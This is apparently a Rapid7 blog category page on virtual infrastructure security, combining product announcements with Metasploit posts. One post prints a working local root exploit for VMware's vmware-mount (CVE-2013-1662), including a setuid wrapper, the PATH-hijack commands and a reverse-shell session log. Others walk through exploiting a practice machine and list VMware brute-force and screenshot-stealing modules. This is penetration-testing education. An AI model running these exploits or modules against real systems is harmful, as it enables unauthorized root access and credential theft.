Rapid7 Blog

Virtual Infrastructure  

Modern Network Coverage and Container Security in InsightVM

For a long time, the concept of “infrastructure” remained relatively unchanged: Firewalls, routers, servers, desktops, and so on make up the majority of your network. Yet over the last few years, the tides have begun to shift. Virtualization is now ubiquitous, giving employees…

For a long time, the concept of “infrastructure” remained relatively unchanged: Firewalls, routers, servers, desktops, and so on make up the majority of your network. Yet over the last few years, the tides have begun to shift. Virtualization is now ubiquitous, giving employees tremendous leeway in their ability to spin up and take down new machines at will. Large chunks of critical processes and applications run in cloud services like Amazon Web Services (AWS) and Microsoft Azure. Containers have made it easy to create and launch large applications across any infrastructure.With all these magical improvements to flexibility and efficiency comes additional risk. Network infrastructure is no longer a room on the second floor of your office building; instead, it's a constantly morphing and shifting mass of potentially vulnerable virtual and cloud devices. Soon, InsightVM, Rapid7's analytics-driven vulnerability management solution, will provide the ability to understand and assess the modern and ever-changing network. Our first major step: container security.I've got a container security problemContainer technology has been growing by leaps and bounds in recent years; it has come a long way from the days of Solaris Zones. If you're into data, check out DataDog's view of Docker adoption. Year-over-year growth of real, productive use of Docker is 40%. Why is that?Containerization shifts not only the deployment philosophy, process, and speed, but more importantly the ownership of IT assets. What once was a clear divide between IT asset owner and software developer/service provider may now be blurry. Software developers use containers to manage more and more application deployment, meaning IT becomes less and less responsible for patching libraries and dependent software packages. When shipped within the container, software dependencies are no longer managed by the host OS but instead by the runtime container environment.Application developers get more efficient. IT teams have less control and less visibility, without any reduction in responsibility.With greater efficiency comes greater riskIn the history of infrastructure, containers are just another technology with which security teams must come to grips. But they also have some unique characteristics that change the behavior of infrastructure. Specifically:Containers are ephemeral. They make modern infrastructure move faster. According to DataDog, “containers have an average lifespan of 2.5 days, while across all companies, traditional and cloud-based VMs have an average lifespan of 23 days.”Container hosts may be densely packed with risk. Much like their hypervisor relatives, container hosts can run any workload and, therefore, assume any risk.Containers are designed to be mixed and matched in myriad ways. Containers aren't assets—nor are they business applications. Container images are immutable building blocks, defined by their cryptographic hash.When combining the factors above, it becomes clear that securing container technology is different than securing a general purpose server or virtual machine.Securing containers with InsightVMWe are working on capabilities in InsightVM to help you assess and contain this risk in 3 primary ways:1. Discovery: InsightVM will increase visibility of where your Docker hosts live in your world so you know where to begin your efforts to contain your container problem. InsightVM will also identify container images, whether running or stopped, and put them at your fingertips: fully searchable by cryptographic hash or container metadata. Simple, easy-to-understand solutions often win the day for time-starved teams. Start with discovery, and increase capability from there. InsightVM will allow customers to discover Docker containers across their environment and understand their container attack surface.2. Configuration: InsightVM will identify container hosts that do not comply with CIS benchmarks for common OSes and Docker itself, and combine that with best-in-class vulnerability and remediation built for IT teams. Ask yourself, which represents less risk, a) or b)?A container image: purposefully configured, built for an application's specific needsA container host: a general purpose computer, configured to run Docker, patched or unpatchedAt face value, I'll take the purposefully configured container over the general purpose computer any day. Even though container images are ephemeral, numerous, and—worst of all—created by those wily developers, they are not general purpose computers and present a different attack surface. Confirm your container hosts are securely configured and vulnerability-free, and you've reduced risk across any container that runs on the host. 3. Assessment: InsightVM will offer a fully integrated container assessment service, providing visibility into vulnerabilities and risk associated with the components and layers of a container. This includes full searchability by cryptographic hash or container metadata. With these additions, InsightVM will make it easy for you to:Perform vulnerability assessment on the container image as it is deployed and exists in productionPerform vulnerability assessment on the container image as it is built, prior to deploymentSecurity teams that have strong application development partnerships can integrate directly into DevOps pipelines (i.e. CI/CD). But for those who do not enjoy such visibility or relationships with development teams, fear not, you can collect and assess a container image as it exists on the container host itself.We are now conducting direct customer engagement on these capabilities through the Rapid7 Voice program with InsightVM customers and will roll out new capabilities starting in Q2 2017. Of course, we have much, much more in store, and I encourage you to reach out to your Customer Success Manager or Account Executive to learn more. Also, if you're not a Rapid7 customer, you can try a free trial of InsightVM for 30-days!NOTE: Rapid7 creates innovative and progressive solutions that help our customers confidently get their jobs done. As such, the development, release, and timing of any product features or functionality described remains at our discretion in order to ensure our customers the excellent experience they deserve, and is not a commitment, promise, or legal obligation to deliver any functionality.

Software defined security made real

This week were headed for VMworld 2014 in San Fransisco and we're excited to be talking about how Rapid7 is partnering with industry leaders like Symantec, Palo Alto Networks, and of course VMware to build out the VMware NSX security ecosystem. Together we've created an…

This week were headed for VMworld 2014 in San Fransisco and we're excited to be talking about how Rapid7 is partnering with industry leaders like Symantec, Palo Alto Networks, and of course VMware to build out the VMware NSX security ecosystem. Together we've created an integrated system that collaborates together leveraging the NSX platform to automate risk identification and mitigation for VMware customers.Why does this matter to security professionals?Well, in order to protect against todays threats and evolving landscape, security teams are constantly challenged to deploy best practices as isolation and network segmentation.  Including any micro-segmentation by application or asset level. This process can be difficult and costly to manage effectively. With VMware NSX (the network virtualization component of the software-defined data center (SDDC)) teams can more easily adopt these practices.Let's go through an example scenario on how you can automate isolation and micro-segmentation.An Application Admin makes a change like applying a patch to their web services in the SDDC. Unknown to the admin the patch he just applied was old and contained an easily exploitable vulnerability that could compromise PII data.  Symantec Data Security Center in real-time detects the change and runs the asset through their security policy rules.  In this scenario, a rule determines that a vulnerability assessment needs to be run immediately and notifies Rapid7 Nexpose.  Then Nexpose performs a vulnerability scan directly through the hyper visor, increasing visibility and performance.  Nexpose finds this critical vulnerability caused by this patch notifies Symantec Data Security Center.This is all happening based on the policies and automated workflows. It keeps going. Palo Alto Networks recommends the machine be quarantined because of sensitive data in this application. The Security admin agrees with that recommendation, so Palo Alto restricts access to the machine and NSX quarantines it. Done. The virtual machine is safely quarantined until further actions are taken to make it secure.This complete workflow is orchestrated through our Symantec, Palo Alto Networks, and VMware partnerships.  It just scratches the service of other automated workflows that are possible. For more information on each solution check of the video or even better join us all at VMworld 2014 this week.

Real-time Protection from Nexpose & VMware NSX

One of Nexpose's core promises, is that we will give you actionable visibility into your physical, cloud, and virtual environments to help you identify what assets are on your network, and what are the most critical security risks to remediate. As a part of supporting…

One of Nexpose's core promises, is that we will give you actionable visibility into your physical, cloud, and virtual environments to help you identify what assets are on your network, and what are the most critical security risks to remediate. As a part of supporting that visibility, Rapid7 and VMware announced last August, that Rapid7 is the first VMware NSX network and security platform ecosystem partner for vulnerability management.  This partnership delivers a revolutionary approach to vulnerability management in conjunction with the software-defined data center (SDDC).    By scanning directly through the hypervisor, security teams can reduce the load on the network, improve security with comprehensive analysis, and automatically isolate risky assets.  Let's take a look at how this improves visibility and helps you create an appropriate action plan. With VMware NSX, you can easily use isolation and segmentation as a security best practice which makes it easy for security teams to create virtual networks that match their unique needs and their security best practices   These networks can be updated frequently and easily as the needs of the business change.  This is where the Rapid7-VMware interoperability shines, since Nexpose scans directly through the hypervisor, it has full visibility into all the virtual machines regardless of the virtual network topology. Interoperability at the hypervisor level also means that administrators can get the benefits of credentialed scans without the overhead of having to manage credentials.   This ensures an up-to-date and accurate picture of your full virtual network. Running in a software-defined data center, security teams can easily deploy a layered approach to security.   However, identifying and remediating the top vulnerabilities, misconfigurations and missing controls remains essential. Looking at the context around a security risk can help to ensure that the team is focused on the most important updates.  For example, does that server that's exposed to the internet have a remote code execution vulnerability with a Metasploit module available?  What about a virtual machine that is vulnerable to an Adobe Reader zero-day?  Armed with this insight, you can efficiently prioritize and remediate the greatest risks. However, not even the most efficient security team can be on top of every security risk every time.   When interoperating with Rapid7, VMware NSX can trigger an automated workflow to protect organizations from an attack on a weakness in the operating system or an application on a virtual machine.  If there is a high risk vulnerability identified, Nexpose will automatically create a security-tag on that virtual machine in VMware NSX.  Security teams can use this tag to automatically put the VM into a "secure" virtual network segment or in an isolation area. This segment can be a quarantined area or one that has limited access to the rest of your network.  Attackers will not be able to get to these vulnerable systems.  After the high risk vulnerabilities are remediated, the virtual machine will be moved back to its original location.  This real-time approach reduces the attack surface and buys additional time to remediate the vulnerability. We are excited about this partnership and the ways that Nexpose and VMware NSX customers can get actionable visibility into the most important vulnerabilities in virtual machines on their network and the automated protection of being able to quarantine risky assets If you'd like to find out more about this innovative integration, please contact us at info@rapid7.com, call 866-7-RAPID7, or read our datasheet.

Weekly Update: Meterpreter Updates, VMWare, the OSX spycam, Retabbing, and more!

Meterpreter UpdatesThis is a big week for Meterpreter. For starters, we've landed a new Meterpreter Python payload. Yes, yes, I know, you thought that Metasploit was all Ruby all the time, but this and the Python payloads for bind shells from Spencer McIntyre should help…

Meterpreter UpdatesThis is a big week for Meterpreter. For starters, we've landed a new Meterpreter Python payload. Yes, yes, I know, you thought that Metasploit was all Ruby all the time, but this and the Python payloads for bind shells from Spencer McIntyre should help out on advancing the state of Meterpreter by leaps and bounds. Despite Metasploit's massive Ruby footprint, most security developers know Python well enough to scratch their own penetration testing itches in it, so I'm looking forward to a lot of active development here. Plus, since Python is part of the Linux Standard Base, you're quite likely to find it on pretty much any normal Linux distribution, so it should see a lot of use for non-Microsoft targets.In other Meterpreter news, we have a new contributor entering the fray on the Windows 32-bit and 64-bit side by the name of OJ Reeves. His entire mission in life (at least, for now) is to make it much easier for normal humans to compile, test, and extend Meterpreter for Windows platform. If you've been down this hacking Meterpreter path in the past, you know what kind of pit vipers can be lurking in that code, so expect to see some massive improvements there in the next couple weeks.VMWare Setuid Exploit (CVE-2013-1662)This week also sees a new local privilege exploit targeting Linux, the VMWare Setuid vmware-mount Unsafe popen(3) module (aka, vmware-mount.rb). Discovered by Google's Tavis Ormandy and implemented by our own James Egypt Lee, this exploits a setuid vulnerability that takes advantage of a VMWare installation to sneak a root shell. Egypt discusses the Metasploit implementation at length in this blog post, so I encourage you to check it out. Note that this module does not enable attackers to escape from the VMWare guest to the host operating system; it's specifically useful for taking advantage of a VMWare installation to elevate privileges on the host OS itself.More OSX HijinksThe other set of modules I want to hilight is a trio from Rapid7's Joe Vennix: the OSX Capture Userspace Keylogger module, the OSX Manage Record Microphone module, and the OSX Manage Webcam module. As you can probably guess by their titles, these are all post-exploit modules penetration testers can exercise to extend their eyes and ears into the site under test. These kind of Hollywood-hacker style post-exploit tricks are exactly the kind of thing that great to demo to clients to help explain the true risk associated with Apple desktop / laptop bugs, since they are, by their nature, pretty dramatic and fun to use.Tab Assassin Finally, this week, we're going to be pulling the trigger on the great retabbing of Metasploit in order to bring us up to the normal, regular coding standards common to Ruby projects. While I have every expectation this change will be traumatic for long-time contributors, we're faithfully document everything along the way under the shortlink http://r-7.co/MSF-TABS. If you have patches and pull requests that are suddenly thrown into a conflicted state this week, the retabbing from @Tabassassin (pictured right) is probably the root cause. But never fear, just read the fine material regarding the change, and you should be back into an unconflicted state in two shakes.New ModulesWe've got eleven new modules this week. Including the ones mentioned above, we've got another three ZDI-derived exploits (which are always informative), a really nicely commented implementation of the MS13-059 exploit for Internet Explorer, and a pair of Windows post modules that can be used to further extend control over the victim machine. As always, thanks everyone for your contributions!Exploit modulesVMWare Setuid vmware-mount Unsafe popen(3) by egyp7 and Tavis Ormandy exploits CVE-2013-1662SPIP connect Parameter PHP Injection by Arnaud Pachot, Davy Douhine, and Frederic Cikala exploits OSVDB-83543HP LoadRunner lrFileIOService ActiveX Remote Code Execution by juan vazquez and rgod exploits ZDI-13-182HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution by juan vazquez and Brian Gorenc exploits ZDI-13-207Firefox XMLSerializer Use After Free by juan vazquez and regenrecht exploits ZDI-13-006MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free by sinn3r and corelanc0d3r exploits MS13-059Auxiliary and post modulesOSX Capture Userspace Keylogger by joevOSX Manage Record Microphone by joevOSX Manage Webcam by joevWindows Gather Prefetch File Information by TJ GladWindows Manage Set Port Forwarding With PortProxy by Borja MerinoIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Fun With VMware Utilities: vmware_mount Exploit (CVE-2013-1662)

On August 22, Tavis Ormandy dropped a bug in VMWare that takes advantage of a build configuration in Linux distributions. Providing you have user-level access to a Debian or Ubuntu box with VMWare installed, this exploit gives you root access. It's a fun bug and…

On August 22, Tavis Ormandy dropped a bug in VMWare that takes advantage of a build configuration in Linux distributions. Providing you have user-level access to a Debian or Ubuntu box with VMWare installed, this exploit gives you root access. It's a fun bug and I want to explain how the Metasploit module for it works: The background There's this thing called priv_mode in bash that means it will drop privs if euid != uid. Anyone who has ever tried to "chmod s /bin/sh" will recognize this as a minor frustration that is easily circumvented by simply writing a wrapper in C that does something like: int main(int argc, char **argv) { setresuid(0,0,0); execl("/bin/sh"); return 0; } That is not the thing that priv_mode is meant to fix (although it is annoying if you don't know what's happening when it appears that your privilege escalation bug is getting you an unprivileged shell). What it is really effective at stopping is the case of a setuid binary calling system(3) or popen(3) before dropping privs. It turns out that VMWare Workstation and Player ship with a binary called vmware-mount that does exactly this. The steps for achieving privilege escalation are pretty straight forward: Create an executable to be used as our payload Write it to the host OS's filesystem (in this case, we have to call it lsb_release) Mark it executable Run the vulnerable setuid binary The exploit This exploit will drop our payload as an executable, so first we include the Msf::Exploit::EXE mixin, which will give us access to several convenience methods for creating executables. include Msf::Exploit::EXE Then, in the exploit method, we create an ELF file with generate_payload_exe. This method is smart enough to build the right kind of executable for whatever platform and architecture is supported by the module and currently selected. Then we just write the file and execute the vulnerable utility with the current directory added to the path. These three lines are basically the meat of the exploit. write_file("lsb_release", generate_payload_exe) cmd_exec("chmod x lsb_release") cmd_exec("PATH=.:$PATH vmware-mount") When our shell runs, it will block the controlling process. In our case, that would cause the existing shell session to hang, which is pretty impolite. To solve that problem, we prepend some shellcode to the generated binary that just forks and exits the parent process, leaving our payload to happily frolick about in the background. The money shot 15:09:57 0 1 exploit(vmware_mount) > sessions -i 1 [*] Starting interaction with 1... id uid=1000(egypt) gid=1000(egypt) groups=1000(egypt),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare) ^Z Background session 1? [y/N]  y 15:09:05 0 1 exploit(vmware_mount) > show options Module options (exploit/linux/local/vmware_mount): Name     Current Setting  Required  Description ----     ---------------  --------  ----------- SESSION  1                yes       The session to run this module on. Payload options (linux/x86/shell/reverse_tcp): Name   Current Setting  Required  Description ----   ---------------  --------  ----------- LHOST  192.168.99.1     yes       The listen address LPORT  1234             yes       The listen port Exploit target: Id  Name --  ---- 0   Automatic 15:09:10 0 1 exploit(vmware_mount) > run [*] Started reverse handler on 0.0.0.0:1234 [*] Max line length is 65537 [*] Writing 175 bytes in 1 chunks of 529 bytes (octal-encoded), using printf [*] Sending stage (36 bytes) to 192.168.99.1 [*] Command shell session 2 opened (192.168.99.1:1234 -> 192.168.99.1:41671) at 2013-09-04 15:08:16 -0500 id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare),1000(egypt) Want to give this a try yourself? If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

VMworldTV Meets the Team Behind Rapid7

Earlier this week, I blogged that Rapid7 is part of VMware NSX ecosystem and gave you an overview of the solution we are working on together with VMware.Check out the below interview with VMworldTV to learn more. Lee Weiner, SVP, Products & Engineering at…

Earlier this week, I blogged that Rapid7 is part of VMware NSX ecosystem and gave you an overview of the solution we are working on together with VMware.Check out the below interview with VMworldTV to learn more. Lee Weiner, SVP, Products & Engineering at Rapid7, talks about the integration between Nexpose-VMware NSX and the key benefits to organizations.Tas Giakouminakis, Co-Founder & CTO at Rapid7, goes through a demonstration of the solution.Now that there are more details, I'm sure everyone really wants to know when the solution is publicly available.  Again, please stay tuned, we are working hard with VMware to bring this solution to our customers.

Rapid7 part of VMware NSX Partner ecosystem

We're very excited that VMware is showcasing Rapid7 as an official VMware NSX Partner at VMworld 2013 this week, demonstrating how we provide best-in-class vulnerability management for virtual networks.Rapid7 has been a longtime partner with VMware.  In 2011, we introduced our vAsset discovery…

We're very excited that VMware is showcasing Rapid7 as an official VMware NSX Partner at VMworld 2013 this week, demonstrating how we provide best-in-class vulnerability management for virtual networks.Rapid7 has been a longtime partner with VMware.  In 2011, we introduced our vAsset discovery method that allows Nexpose to have real-time visibility into changes to your virtual environment.  This helped solve the gap security administrators commonly had with knowing how their virtual environment is changing.  Fast forward to 2013, now we are revolutionizing how core vulnerability assessment is done in a virtual infrastructure.We've listened to challenges our customers have with vulnerability scanning in virtual environments and worked closely together with VMware to develop a joint solution. Customers frequently told us that traditional vulnerability scans run over the network against virtual machines to identify vulnerabilities.  As a result, this takes up network bandwidth, only identifies devices connected to the network, and is limited to the speed of the connection.  And deep scanning requires authentication scan credentials to be supplied, which can be a time consuming process with additional management overhead.  This prevented them from having the real-time visibility into the vulnerabilities in their virtual environment.To address these challenges, Nexpose integrates fully with the NSX platform to perform vulnerability scans through the hypervisor without requiring a network connection between scan engine and virtual machines to identify security risk.  By leveraging the NSX platform, authentication credentials do not need to be supplied for deep scanning of assets both online, for vulnerabilities and insecure configurations.  Users can safely scan their virtual devices in an efficient manner to avoid any VM Network "Storm" scenarios, even as virtual devices move from server to server.The benefits from this approach are fast and accurate vulnerability assessment by scanning through the hypervisor, minimized network traffic and target scan host impact, automated setup and configuration of Nexpose to scan your virtual environment based on changing VMware NSX infrastructure, and automated security protection through VMware NSX by leveraging security-based tags created by Nexpose based upon security risk to organizations.This solution will provide security administrators with real-time visibility into their security risk for virtual machines with reduced management overhead.Now I know everyone is wondering when this will be available, stay tuned, we are still working hard with VMware to bring this solution to our customers.

Free Metasploit Penetration Testing Lab In The Cloud

No matter whether you're taking your first steps with Metasploit or if you're already a pro, you need to practice, practice, practice your skillz. Setting up a penetration testing lab can be time-consuming and expensive (unless you have the hardware already), so I was very…

No matter whether you're taking your first steps with Metasploit or if you're already a pro, you need to practice, practice, practice your skillz. Setting up a penetration testing lab can be time-consuming and expensive (unless you have the hardware already), so I was very excited to learn about a new, free service called Hack A Server, which offers vulnerable machines for you to pwn in the cloud. The service only required that I download and launch a VPN configuration to connect to the vulnerable machines. Since I already had my Metasploit instance set up on BackTrack, it only took minutes to get started. Once you're up and running, you can choose from a large number of vulnerable machines, including Metasploitable. (Note: If you'd prefer to set up your own Metasploitable instance, you can download Metasploitable here.)This How-to will use BackTrack5 R3, which is available from backtrack-linux.org, but you should also be able to use any other Linux distribution. I did not see any way on the Hack-A-Server website to get their VPN client working on Windows, so I'd recommend you stick to Linux. I already pre-registered my version of Metasploit on BackTrack for the quick penetration test in the latter part of this post. If you need help, check out this blog post on activating Metasploit on BackTrack5 R3.If you'd like to use the service, go to Hack A Server and sign up for a free account. Once you're signed up, choose Training Area in the toolbar:As you can see, they have a ton of vulnerable machines available on the service. For the purpose of this test, we're going to choose Metasploitable. Click on the Hack it! button.Download the connection certificate to root, then run the following commands:unzip pradameinhoff-connectionpack.zipopenvpn client.confNote: The zip file will have a different name (pradameinhoff is my username on HackAServer.com). Type ls to view how it looks in your directory.If your VPN client has started correctly, you should now see something like this on the screen:Open a second terminal window and ping the Metasploitable server on 10.2.32.232 (this was listed on the HTML page earlier).ping 10.2.32.232You should be seeing something like this on your screen:This proves that you have a network connection to the Metasploitable machine. Congratulations!Now let's exploit the machine with Metasploit Pro:Open your Firefox browser to https://localhost:3790 Go into the default project and click on the Scan button. Enter 10.2.32.232 and click Launch ScanOnce the scan has completed, go to the Analysis menu and choose the Hosts option. You should now see the host in the list:Select the checkbox next to the Metasploitable machine and click the Exploit button in the toolbar.On the next screen, click Exploit on the bottom right:Metasploit Pro will now match up the right exploits with the operating system and services fingerprinted on the Metasploitable machine and then launch the smart exploitation process. For Metasploitable, it will likely be successful with exploit/unix/misc/distcc_exec. (If you are using Metasploit Community, you can manually choose this exploit since this edition doesn't support the smart exploitation process).Once the smart exploitation process has completed, click on the Sessions button in the toolbar. You should see one open session: Click on Collect, check the box next to Session 1, and click the Collect System Data button on the bottom right. Metasploit Pro will now collect passwords, screenshots, and other evidence from the machine. Going back to the Hosts screen in the Analysis menu, you'll see that the machine is marked as looted:Congratulations again - you've compromised your first machine. Now you can also check out some other vulnerable machines on the same network, which you can also reach through the same VPN connection provided by the Hack-a-Server website.I'd be interested to hear how you find the service and whether it worked as seamlessly for you as it did for me. Please log in and leave your comment below!

Getting the Most from Customizable CSV Exports - Part 6

Hi, my name is Eden Martinez, and I'm a Federal Sales Engineer with Rapid7. Larger environments often list scalability as one of their top problems; specifically, too much data. With current tools, it's not hard to generate large data sets. Most tools are comprehensive with…

Hi, my name is Eden Martinez, and I'm a Federal Sales Engineer with Rapid7. Larger environments often list scalability as one of their top problems; specifically, too much data. With current tools, it's not hard to generate large data sets. Most tools are comprehensive with a focus on the largest list of results wins. While you can turn all the knobs on Nexpose up to 11, I've found many enterprise environments prefer to focus on prioritization of vulnerabilities and trending of the results. Management in particular needs to see, at a glance, how the vulnerability program is doing over time. Criteria varies per environment, but a high, medium, low classification of severity is common, with the lows potentially being weeded out (ICMP Timestamp). While Nexpose has some great trending reports out of the box today, one of the views it can't currently give is slicing time up in to segments (30 day, quarters, etc). Nexpose's risk scoring is very rich, and I highly recommend using it to prioritize remediation. One problem with a numerical risk score is it loses context outside of the tool, or away from the rest of the data/assets, which is not good for management that isn't hands-on with Nexpose. Exactly how bad is a score of 919? A high is always going to be just that, higher than medium or low. Additionally, for compliance and standardization, many of the Federal environments are standardizing on CVSS. So I use that as my basis for the severity levels. I've put something together to help fill that gap with a little Excel Visual Basic. Hope it helps. Let me know if you have any questions in the comments section.Report 1: I'd like to see a breakdown of vulnerability severity by 30 day increments. WHO: Primarily management, security or IT, who need to see some better trending and breakdowns. As such, I didn't include the vulnerabilities themselves to keep the report high level, but they could easily be added. WHAT: Breakdown of High, Medium, and Low by CVSS Score of 10-8, 7-5, 4-1 respectively. Trying to prove less is more, I only pull two data fields out of Nexpose: Severity Level and Vulnerability Age. I left everything on one worksheet, which is messier but shows more clearly how the data is manipulated by Excel. Nexpose includes the word Days in the vulnerability age, and it's easy enough to copy that data into a new column for additional calculations. The Setup Command macro runs through all the data to generate what the pivot chart needs, which is already created and just using the Vulnerability Severity Level and Trending Age columns. WHY: When management can see a good chart that shows no red flags, they leave everyone alone!HOW: You'll need to use my Excel worksheet, with macros enabled (sorry). No virus in there, promise, but you can throw it in to a dev environment. If you want to put your own data in here, just copy over Column A and B. The macro is smart enough to calculate the number of rows automatically without you needing to define it anywhere. Click on the Setup button to recalculate at any time. Want to weed out results less than 30 days, or the lows? You can click on the Vulnerability Severity Level or Trending Age buttons on the pivot chart and uncheck those boxes.

Automating Nexpose Discovery Connections through the Java API

Nexpose has long offered APIs allowing for automated workflow operations. The following examples are intended to help Nexpose users automate the discovery mechanisms feature through the API. The following code shows how to leverage the Java API client to create, list, update and delete discovery…

Nexpose has long offered APIs allowing for automated workflow operations. The following examples are intended to help Nexpose users automate the discovery mechanisms feature through the API. The following code shows how to leverage the Java API client to create, list, update and delete discovery mechanisms in Nexpose. Nexpose supports Discovery connection API starting on version 5.2.  The supported operations on the API with regards to discovery are: DiscoveryConnectionCreateRequest To create a discovery connection. This automatically establishes the connection between Nexpose and the discovery mechanism, for instance, you would use this to create a connection to a VMware deployment managed by a vCenter server instance. DiscoveryConnectionConnectRequest To re-establish a lost connection. DiscoveryConnectionUpdateRequest To update the settings of an existing discovery connection. You would use this if you change the password of the user used in Nexpose to connect to a discovery connection. For instance if you change the password of your Nexpose user in VMware, you would need to update the connection to reflect this change. DiscoveryConnectionListingRequest To list the discovery connections that exist in Nexpose. DiscoveryConnectionDeleteRequest To delete a discovery connection. I have enhanced the Java API client to support the previous operation and the latest code can be checked out from clee-r7/nexpose_java_api · GitHub The following are the examples of using the operations in java code. 1) Create operation DiscoveryConnectionCreateRequest createConnectionRequest = new DiscoveryConnectionCreateRequest (sessionID, // the session ID "sync", // the sync id "username", // the user name to connect the server. "HTTPS", // the protocol to connect the server "port number", //the port  to connect the server "vcenter ", // the name of the server "con1", // The name of the connection "password"); // password to connect the server APIResponse createConnectionResponse = session.executeAPIRequest(createConnectionRequest); // Get the connection id from the response. String connectionID = createConnectionResponse.grab("/DiscoveryConnectionCreateResponse/@id"); 2) Update Operation DiscoveryConnectionUpdateRequest updateConnectionRequest = new DiscoveryConnectionUpdateRequest (sessionID, // the session ID "sync", // the sync id "username", // the user name to connect the server. "HTTPS", // the protocol to connect the server "port number",              //the port  to connect the server "vcenter ", // the name of the server "con1", // The name of the connection "password" // password to connect the server “connectionID”); // the id of the connection APIResponse updateConnectionResponse = session.executeAPIRequest(updateConnectionRequest); // get the sync id from the response. String syncID = updateConnectionResponse.grab("/DiscoveryConnectionUpdateResponse/@sync-id"); 3) Delete Operation DiscoveryConnectionDeleteRequest deleteConnectionRequest = new DiscoveryConnectionDeleteRequest (sessionID, // the session ID "sync", // the sync id “connectionID”); // the id of the connection APIResponse deleteConnectionResponse = session.executeAPIRequest(deleteConnectionRequest); // get the sync id from response String syncID = deleteConnectionResponse.grab("/DiscoveryConnectionDeleteResponse/@sync-id"); 4) List Operation DiscoveryConnectionListingRequest connectionListingRequest = new DiscoveryConnectionListingRequest (sessionID, // the session ID "sync"); // the sync id APIResponse connectionListingResponse = session.executeAPIRequest(connectionListingRequest); // get the sync id from response String syncID = connectionListingResponse.grab("/DiscoveryConnectionListingResponse/@sync-id"); So you can easily manage your virtual connections. Let the automation begin!

Testing the Security of Virtual Data Centers

If you are doing security assessments, you are probably running into virtual servers every day. According to analyst firm Gartner, 80% of companies now have a virtualization project or program. With the recent 4.2 release of Metasploit, your next penetration test should be much…

If you are doing security assessments, you are probably running into virtual servers every day. According to analyst firm Gartner, 80% of companies now have a virtualization project or program. With the recent 4.2 release of Metasploit, your next penetration test should be much more fun. For example, Metasploit now flags ESX Servers as virtual hosts in the user interface: If you are managing virtual servers, you may have come across the VMware vSphere Web Services SDK. It's a powerful way to manage virtual machines on ESX/ESXi and vCenter Server systems, with a documentation that rivals the New York phone book (if it still exists as a printed version). Like most self-respecting APIs, it requires you to authenticate with a username and password. This password may be the lynchpin of your virtual data security. In other words, you may be well advised to audit that the passwords for this API are not found in Average Joe's common password list. In the recent 4.2 release, Metasploit has added a new module that brute forces passwords for the VMware vSphere Web Services API, plus a few modules that enable penetration testers to have fun with the virtual data center. The most simple modules enable you to shut down a critical server or spin up a virtual machine that's laid dormant for months - and is probably crawling with vulnerabilities you can attack. You can also collect screenshots from all guest systems, which will come in handy for your security assessment report. Systems running VMware virtualization technology, including ESX Server and VMware Workstation, also have a service called VMauthD, which enables authentication through the OS's local user credentials. Metasploit now includes a brute force module for VMAuthD authentication, which provides an alternative service to obtain system credentials. If an ESX server is integrated with the Windows Active Directory, the enum_users module will even generate a list of all users and groups on the domain, which is fantastic for reconnaissance. Here's a list of all the fun modules you can throw at your virtualized data center directly from Metasploit: Metasploit Module Description auxiliary/admin/vmware/poweroff_vm This module will log into the Web API of VMware and try to power off a specified Virtual Machine. auxiliary/admin/vmware/poweron_vm This module will log into the Web API of VMware and try to power on a specified Virtual Machine. auxiliary/admin/vmware/tag_vm This module will log into the Web API of VMware and 'tag' a specified Virtual Machine. It does this by logging a user event with user supplied text auxiliary/admin/vmware/terminate_esx_sessions This module will log into the Web API of VMware and try to terminate user login sessions as specified by the session keys. post/multi/gather/find_vmx This module will attempt to find any VMware virtual machines stored on the target. auxiliary/scanner/vmware/esx_fingerprint This module accesses the web API interfaces for VMware ESX/ESXi servers and attempts to identify version information for that server. auxiliary/scanner/vmware/vmauthd_login This module will test vmauthd logins on a range of machines and report successful logins. auxiliary/scanner/vmware/vmware_enum_permissions This module will log into the Web API of VMware and try to enumerate all the user/group permissions. Unlike enum suers this is only users and groups that specifically have permissions defined within the VMware product auxiliary/scanner/vmware/vmware_enum_sessions This module will log into the Web API of VMware and try to enumerate all the login sessions. auxiliary/scanner/vmware/vmware_enum_users This module will log into the Web API of VMware and try to enumerate all the user accounts. If the VMware instance is connected to one or more domains, it will try to enumerate domain users as well. auxiliary/scanner/vmware/vmware_enum_vms This module attempts to discover virtual machines on any VMware instance running the web interface. This would include ESX/ESXi and VMware Server. auxiliary/scanner/vmware/vmware_host_details This module attempts to enumerate information about the host systems through the VMWare web API. This can include information about the hardware installed on the host machine. auxiliary/scanner/vmware/vmware_http_login This module attempts to authenticate to the VMware HTTP service for VMware Server, ESX, and ESXi auxiliary/scanner/vmware/vmware_screenshot_stealer This module uses supplied login credentials to connect to VMware via the web interface. It then searches through the data stores looking for screenshots. It will download any screenshots it finds and save them as loot. In addition to the VMware modules, we've also added a post-exploitation module for VirtualBox, called post/multi/gather/enum_vbox. This module will attempt to enumerate any VirtualBox VMs on the target machine. Due to the nature of VirtualBox, this module can only enumerate VMs registered for the current user, therefore, this module needs to be invoked from a user context. If you would like to hear more about pentesting virtual environments, sign up for our free webcast with David Maloney from the Metasploit engineering team who developed most of the new virtual pwning goodness.

Nexpose 5.0 Release

Today we released the latest version of Nexpose. This is a great release for those of you who are working in virtual environments as it adds dynamic virtual asset tracking, allows you to track configuration policy scans, and even introduces a new look and feel…

Today we released the latest version of Nexpose. This is a great release for those of you who are working in virtual environments as it adds dynamic virtual asset tracking, allows you to track configuration policy scans, and even introduces a new look and feel for the product itself. Additionally, it includes capabilites to generate a Real Risk score that incorporates known Malware Exposure and allows you to track risk trends over time. Here's a link to the announcement we made at this year's UNITED Security Summit.  With all this great news, we want to hear from you. Please share your thoughts on Nexpose 5.0, or our exciting funding news, or anything else you want to share with us. Please leave a comment here on the blog or send thoughts to rawfeedback@rapid7.com, and let us know, what do you think?

Virtualization - Introduces New Security Gaps

